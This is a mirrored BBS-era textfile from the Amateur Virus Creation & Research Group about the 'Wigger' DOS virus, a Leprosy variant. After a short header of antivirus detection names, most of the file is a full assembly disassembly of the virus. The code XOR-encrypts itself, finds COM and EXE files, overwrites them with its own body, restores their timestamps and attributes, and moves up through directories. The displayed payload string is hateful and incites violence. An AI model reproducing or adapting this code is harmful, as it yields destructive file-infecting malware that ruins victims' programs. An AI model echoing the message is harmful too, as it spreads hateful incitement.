informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/virus/avcr-01.008

453 lines
22 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

ÛÛÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛÛ Û ÛÛÛÛÛÛÛÛ
Û Û Û Û Û ÛÛÛ ÛÛ
Û Û Û Û Û Û ÛÛ
ÛÛÛÛÛÛÛÛÛÛÛ Û Û Û Û
Û Û Û Û Û Û
Û Û Û Û Û Û
Û Û ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛ Û
ÛÛÛ ÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛ Û Û Û ÛÛÛÛÛÛÛ
Û ÛÛÛ Û Û Û Û Û Û ÛÛ Û ÛÛ Û Û
Û Û Û Û Û ÛÛÛÛ Û Û ÛÛ Û Û Û Û ÛÛÛÛÛ
Û Û ÛÛÛÛÛÛÛÛ Û ÛÛ ÛÛÛÛÛÛÛÛ ÛÛ Û Û Û Û Û
Û Û Û Û ÛÛÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛ Û Û ÛÛ ÛÛÛÛÛÛÛ
Distributed By Amateur Virus Creation & Research Group (AVCR)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Research of the wigger virus
by
Security Threat
Name: Wigger
-----------------------------------------------------------------------------
Alias:
-----------------------------------------------------------------------------
Type Of Code: Not Informed
-----------------------------------------------------------------------------
VSUM Information: No info found on WIGGER.COM
-----------------------------------------------------------------------------
Antivirus Detection:
(1)
ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy
(2)
Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b
(3)
McAfee Softwares Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b
(4)
MicroSoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus"
-----------------------------------------------------------------------------
Execution Results: Infects all COM and EXE files.
-----------------------------------------------------------------------------
Cleaning Recommendations: Impossible. Infected programs must be deleted
-----------------------------------------------------------------------------
Researcher's Notes: As infecting either reads "program to big to fit in
memory" or "You have noticed wiggers seem to have taken over the high school
scene." "If you see one, please hit him with your car". It is a variant of
leprosy. Also "News flash","Plague","viper","busted","leprosy-c",
"leprosy-d", "scribble","seneca","surfer","xarbras",and "angel of death"
-----------------------------------------------------------------------------
Disassembly of the wigger Virus
PAGE 60,132
;ÄÄÄÄÄÄÄÄÄÄ CODE_SEG_1 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
CODE_SEG_1 segment para public
assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1
org 100h
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± ENTRY POINT
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± PROCEDURE proc_start
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
proc_start proc far
start: ; N-Ref=0
call near ptr proc_2
jmp loc_5
proc_start endp
var1_106 db 0
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± PROCEDURE proc_1
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
proc_1 proc near
mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0
push BX
call near ptr proc_2
pop BX
mov CX,29Ah
mov DX,offset var1_100
mov AH,40h ; '@'
int 21h ; DOS func ( ah ) = 40h
; Write to file or device
;BX-file handle
; CX-bytes to read DS:DX-DTA
;if CF=0 AX-bytes read
; else AX-ret code
call near ptr proc_2
retn
proc_1 endp
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± PROCEDURE proc_2
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
proc_2 proc near
mov BX,offset var1_131
loc_1: ; N-Ref=1
mov AH,Byte Ptr [BX]
xor AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h
mov Byte Ptr [BX],AH
inc BX
cmp BX,3CBh
jle loc_1 ; Jump if not greater ( <= )
retn
proc_2 endp
var1_131 db '*.EXE'
db 0
var1_137 db '*.COM'
db 0
var1_13d db 2Eh, 2Eh, 0
var1_140 db 0Dh, 0Ah
db 'Program too big to fit in memory$'
var1_163 db 0Dh, 0Ah, 9, 0C9h
db 66 dup (0CDh)
db 0BBh, 20h, 24h
var1_1ac db 0Dh, 0Ah, 9, 0BAh
db 20h, 20h, 57h
var1_1b3 db 'e Have Noticed That Wiggers Seem To Have'
loc_2: ; N-Ref=0
and Byte Ptr [SI+61h],DL
var1_1de db 'ken Over The High '
db 0BAh, 20h, 24h
var1_1f5 db 0Dh, 0Ah, 9, 0BAh
var1_1f9 db ' School Scen'
var1_207 db 'e. If You See One, Please Hit Him With Your Car! '
db ' '
db 0BAh, 20h, 24h
var1_23e db 0Dh, 0Ah
loc_3: ; N-Ref=0
or AX,CX
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
int 0CDh
mov SP,2420h
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
add Byte Ptr [BX+SI],AL
loc_5: ; N-Ref=4
mov AH,2Ch ; ','
int 21h ; DOS func ( ah ) = 2Ch
; Get time
;CL-min CH-hours DH-seconds
; DL-1/100 of secs
cmp Byte Ptr var1_106,0 ; [6556:0106] = 8B00h
je loc_6 ; Jump if equal ( = )
cmp DH,0Fh
jnle loc_7 ; Jump if greater ( > )
loc_6: ; N-Ref=1
cmp DL,0
je loc_5 ; Jump if equal ( = )
mov Byte Ptr var1_106,DL ; [6556:0106] = 8B00h
loc_7: ; N-Ref=1
mov Byte Ptr var1_29b,0 ; [6556:029B] = 0
mov Byte Ptr var1_29c,4 ; [6556:029C] = 0
mov Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h
loc_8: ; N-Ref=1
mov CX,27h
mov DX,offset var1_131
mov AH,4Eh ; 'N'
int 21h ; DOS func ( ah ) = 4Eh
; FIND FIRST: Start file search
;CX-attr to search on
; DS:DX-ASCIIZ string
;if CF=1 AX-ret code
cmp AX,12h
je loc_9 ; Jump if equal ( = )
call near ptr proc_3
loc_9: ; N-Ref=1
mov CX,27h
mov DX,offset var1_137
mov AH,4Eh ; 'N'
int 21h ; DOS func ( ah ) = 4Eh
; FIND FIRST: Start file search
;CX-attr to search on
; DS:DX-ASCIIZ string
;if CF=1 AX-ret code
cmp AX,12h
je loc_10 ; Jump if equal ( = )
call near ptr proc_3
loc_10: ; N-Ref=1
mov DX,offset var1_13d
mov AH,3Bh ; ';'
int 21h ; DOS func ( ah ) = 3Bh
; CHDIR: Change directory
;DS:DX-ASCIIZ string
;AX-ret code if CF set
dec Byte Ptr var1_29c ; [6556:029C] = 0
jne loc_8 ; Jump if not equal ( != )
jmp loc_15
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± PROCEDURE proc_3
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
proc_3 proc near
loc_11: ; N-Ref=1
mov BX,80h
mov AX,Word Ptr [BX+15h]
mov Word Ptr var1_2a1,AX ; [6556:02A1] = 0
mov AX,Word Ptr [BX+16h]
mov Word Ptr var1_29d,AX ; [6556:029D] = 0
mov AX,Word Ptr [BX+18h]
mov Word Ptr var1_29f,AX ; [6556:029F] = 0
mov DX,9Eh
mov CX,0
mov AL,1
mov AH,43h ; 'C'
int 21h ; DOS func ( ah ) = 43h
; CHMOD:Get/set file attributes
;AL-(0/1)get/set code CX-attrib
; DS:DX-ASCIIZ string
;if CF=1 AX-ret code
; CX-attrib if set used
mov AL,2
mov AH,3Dh ; '='
int 21h ; DOS func ( ah ) = 3Dh
; Open file
;CX-acsess code
; DS:DX-ASCIIZ string
;AX-file handle
; if CF=1 AX-error code
mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0
mov BX,AX
mov CX,14h
mov DX,offset var1_287
mov AH,3Fh ; '?'
int 21h ; DOS func ( ah ) = 3Fh
; Read from file or device
;BX-file handle
; CX-bytes to read DS:DX-DTA
;if CF=0 AX-bytes read
; else AX-ret code
mov BX,offset var1_287
mov AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h
mov Byte Ptr [BX+6],AH
mov SI,offset var1_100
mov DI,offset var1_287
mov AX,DS
mov ES,AX
cld ; Clear direction flag
repz cmpsb ; Repeat if ZF = 1, CX > 0
; Cmp byte at DS:SI to ES:DI
jne loc_14 ; Jump if not equal ( != )
call near ptr proc_4
inc Byte Ptr var1_29b ; [6556:029B] = 0
loc_12: ; N-Ref=1
mov AH,4Fh ; 'O'
int 21h ; DOS func ( ah ) = 4Fh
; FIND NEXT: Continue file search
;DS:DX-info from FIND FIRST
; or prev FIND NEXT
;if CF=1 AX-ret code
cmp AX,12h
je loc_13 ; Jump if equal ( = )
jmp short loc_11
loc_13: ; N-Ref=1
retn
loc_14: ; N-Ref=1
mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0
mov AH,3Eh ; '>'
int 21h ; DOS func ( ah ) = 3Eh
; Close file handle
;BX-file handle
;if CF=1 AX-ret code
mov AH,3Dh ; '='
mov DX,9Eh
mov AL,2
int 21h ; DOS func ( ah ) = 3Dh
; Open file
;CX-acsess code
; DS:DX-ASCIIZ string
;AX-file handle
; if CF=1 AX-error code
mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0
call near ptr proc_1
call near ptr proc_4
inc Byte Ptr var1_2a5 ; [6556:02A5] = 0B400h
dec Byte Ptr var1_29c ; [6556:029C] = 0
je loc_15 ; Jump if equal ( = )
jmp short loc_12
proc_3 endp
db 0C3h
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;± PROCEDURE proc_4
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
proc_4 proc near
mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0
mov CX,Word Ptr var1_29d ; [6556:029D] = 0
mov DX,Word Ptr var1_29f ; [6556:029F] = 0
mov AL,1
mov AH,57h ; 'W'
int 21h ; DOS func ( ah ) = 57h
; Get/set file date and time
;AL-(0/1)get/set flag BX-handle
; CX/DX-time/date,if AL=1
;if CF=1 AX-extended err code
; CX/DX-time/date if AL=0
mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0
mov AH,3Eh ; '>'
int 21h ; DOS func ( ah ) = 3Eh
; Close file handle
;BX-file handle
;if CF=1 AX-ret code
mov CX,Word Ptr var1_2a1 ; [6556:02A1] = 0
mov AL,1
mov DX,9Eh
mov AH,43h ; 'C'
int 21h ; DOS func ( ah ) = 43h
; CHMOD:Get/set file attributes
;AL-(0/1)get/set code CX-attrib
; DS:DX-ASCIIZ string
;if CF=1 AX-ret code
; CX-attrib if set used
retn
proc_4 endp
loc_15: ; N-Ref=2
cmp Byte Ptr var1_29b,6 ; [6556:029B] = 0
jl loc_16 ; Jump if less ( < )
cmp Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h
jnle loc_16 ; Jump if greater ( > )
mov AH,9
mov DX,offset var1_163
int 21h ; DOS func ( ah ) = 9
; Display string
;DS:DX-output string
mov DX,offset var1_1ac
int 21h ; DOS func ( ah ) = 9
; Display string
;DS:DX-output string
mov DX,offset var1_1f5
int 21h ; DOS func ( ah ) = 9
; Display string
;DS:DX-output string
mov DX,offset var1_23e
int 21h ; DOS func ( ah ) = 9
; Display string
;DS:DX-output string
jmp short loc_17
db 90h
loc_16: ; N-Ref=2
mov AH,9
mov DX,offset var1_140
int 21h ; DOS func ( ah ) = 9
; Display string
;DS:DX-output string
loc_17: ; N-Ref=1
mov AH,4Ch ; 'L'
int 21h ; DOS func ( ah ) = 4Ch
; Terminate process
;AL-ret code
dw 7 dup (9090h)
db 90h
CODE_SEG_1 ends
end start
-----------------------------------------------------------------------------
This seems to be similar to the leprosy B code except for encryption
and strings displayed.
ST
Reference in New Issue View Git Blame Copy Permalink